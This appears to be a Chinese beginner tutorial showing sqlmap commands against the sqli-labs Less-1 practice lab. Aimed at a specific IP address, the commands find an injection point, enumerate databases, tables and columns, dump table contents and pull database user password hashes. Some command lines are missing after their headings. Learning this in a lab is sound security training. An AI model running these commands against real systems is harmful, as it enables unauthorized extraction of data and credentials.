文章摘要
这篇文章介绍了如何使用SQLMAP工具进行SQL注入攻击检测,通过一步步的操作演示,展示了如何通过SQLMAP快速扫描网站,获取注入点、数据库信息等关键内容。文章内容从判断是否存在注入点,到查询用户、获取数据库名、表名、字段名、密码等,详细介绍了SQLMAP的强大功能。文章强调了SQLMAP在渗透测试中的重要性,并通过实际操作案例,帮助读者理解如何利用这一工具快速发现网站漏洞。总体来说,文章内容简明扼要,突出了SQLMAP的快速扫描和信息获取优势,适合初学者快速上手学习。
目录一、判断是否存在注入点二、查询当前用户下所有数据库三、获取数据库中的表名四、获取表中的字段名五、获取字段内容六、获取数据库的所有用户七、获取数据库用户的密码八、获取当前网站数据库的名称九、获取当前网站数据库的用户名称
原来sql注入如此简单
以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
使用命令:
使用命令:
有图中白色背景的 则判断出有注入点

使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –dbs
可以看到有五个表

选取一个challenges数据库,获取此库的表名
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges –tables

选取表T5M0QG6FM2,获取其中字段名
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges -T T5M0QG6FM2 –columns

使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges -T T5M0QG6FM2 –columns –dump

使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –users
使用该命令就可以列出所有管理用户

使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –passwords

使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –current-db

可以看到当前的数据库是 security
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –current-user
当前用户是root

到此这篇关于SQL注入之sqlmap入门学习的文章就介绍到这了,更多相关sqlmap入门内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
您可能感兴趣的文章:sqlmap之os?shell图文详细解析教你编写SQLMap的Tamper脚本过狗SQLMAP插件tamper模块简介SQLMAP插件tamper编写与使用详解sqlmap注入图文详解
© 版权声明
文章版权归作者所有,未经允许请勿转载。